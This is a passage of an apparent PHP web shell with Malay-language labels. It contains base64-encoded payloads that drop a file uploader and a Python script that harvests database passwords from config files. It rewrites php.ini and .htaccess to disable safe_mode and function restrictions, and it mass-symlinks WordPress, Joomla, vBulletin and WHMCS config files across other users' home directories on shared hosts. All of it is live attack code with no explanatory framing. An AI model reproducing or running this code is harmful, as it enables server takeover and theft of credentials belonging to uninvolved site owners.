  2674. $back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
  2675. $file = fopen(".php","w+");
  2676. $write = fwrite ($file ,base64_decode($back));
  2677. fclose($file);
  2678. chmod(".php",0755);
  2679. mkdir('config',0755);
  2680. $cp =
  2681. 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
  2682. $file = fopen("cp.py","w+");
  2683. $write = fwrite ($file ,base64_decode($cp));
  2684. fclose($file);
  2685. chmod("cp.py",0755);
  2686. $url = $_POST['url'];
  2687. echo"<center>
  2688. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
  2689. system("python cp.py $url config");
  2690. unlink ('cp.py');
  2691. echo"</textarea>
  2692. </center>";
  2693. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  2694. exit;
  2695. }
  2696. if($_POST['matikan']=='sekatan'){
  2697. @error_reporting(0);
  2698. $phpini =
  2699. 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
  2700. $file = fopen("php.ini","w+");
  2701. $write = fwrite ($file ,base64_decode($phpini));
  2702. fclose($file);
  2703. $htaccess =
  2704. 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
  2705. $file = fopen(".htaccess","w+");
  2706. $write = fwrite ($file ,base64_decode($htaccess));
  2707. echo "<hr><center><b>DONE!";
  2708. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  2709. exit;
  2710. }
  2711. if($_POST['mendapatkan']=='passwd'){
  2712. @set_magic_quotes_runtime(0);
  2713. ob_start();
  2714. error_reporting(0);
  2715. @set_time_limit(0);
  2716. @ini_set('max_execution_time',0);
  2717. @ini_set('output_buffering',0);
  2718. $fn = $_POST['foldername'];
  2719. //all function here
  2720.  
  2721. function syml($usern,$pdomain)
  2722.         {
  2723.                 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  2724.                 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  2725.                 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  2726.                 symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  2727.                 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  2728.                 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  2729.                 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  2730.                 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  2731.                 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  2732.                 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  2733.                 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  2734.                 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  2735.                 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  2736.                 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  2737.                 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  2738.                 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  2739.                 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  2740.                 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  2741.                 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  2742.                 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  2743.                 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  2744.                 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  2745.                 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  2746.                 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  2747.                 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  2748.                 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  2749.                 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  2750.                 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  2751.                 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  2752.                 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  2753.                 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  2754.                 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  2755.                 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  2756.                 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  2757.                 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  2758.                 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  2759.                 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  2760.                 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  2761.                 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  2762.                 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  2763.                 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  2764.                 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  2765.                 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  2766.                 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  2767.                 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  2768.                 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  2769.                 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  2770.                 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  2771.                 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  2772.                 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  2773.                 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  2774.                 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  2775.                 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  2776.                 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  2777.                 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  2778.                 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  2779.                 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  2780.                 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  2781.                 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  2782.                 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  2783.                 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  2784.                 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  2785.                 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  2786.                 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  2787.                 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  2788.                 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  2789.                 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  2790.                 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  2791.                 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  2792.                 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  2793.                 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  2794.                 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  2795.                 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  2796.                 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  2797.                 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  2798.                 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  2799.                 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  2800.                 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  2801.                 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  2802.                 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  2803.                 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  2804.                 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  2805.                 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  2806.                 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  2807.                 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  2808.                 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  2809.                 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  2810.                 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  2811.                 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  2812.                 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  2813.                 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  2814.                 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  2815.                 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  2816.                 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  2817.                 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  2818.                 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  2819.                 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  2820.                 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  2821.                 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  2822.                 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  2823.                 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  2824.                 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  2825.                 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  2826.                 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  2827.                 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  2828.                 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  2829.                 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  2830.                 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  2831.                 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  2832.                 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  2833.                 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  2834.                 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  2835.                 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  2836.                 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  2837.                 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  2838.                 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  2839.                 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  2840.                 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  2841.                 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  2842.                 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
